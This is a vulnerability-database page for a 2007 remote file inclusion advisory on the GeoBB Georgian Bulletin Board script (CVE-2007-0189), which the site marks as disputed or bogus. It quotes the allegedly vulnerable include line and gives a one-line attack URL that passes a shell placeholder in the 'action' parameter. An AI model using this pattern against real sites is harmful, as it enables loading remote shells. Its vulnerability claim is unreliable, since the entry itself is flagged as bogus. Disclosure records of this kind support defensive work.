Bogus: GeoBB Georgian Bulletin Board Remote File Include Vuln. ( Ascii Version )

Search:
WLB2

Disputed / BOGUS
GeoBB Georgian Bulletin Board Remote File Include Vuln.

Published
Credit
Risk
2007.01.14
ShaFuck31
High
CWE
CVE
Local
Remote
N/A
CVE-2007-0189
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

# BhhGroup.Org & Bilgi-Yonetimi.Org.Tr

# script name : GeoBB Georgian Bulletin Board

# Script Download : http://hotscripts.com/Detailed/58100.html

# Risk : High

# Found By : ShaFuck31

# Vulnerable file : index.php

Vuln. Code:
require($action.'.php');

#Vuln :
http://www.victim.com/ScriptPath/index.php?action=[sheLL]

# Thanks : 4LL bL4ck h4t us3rs & my fr13ndZ

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version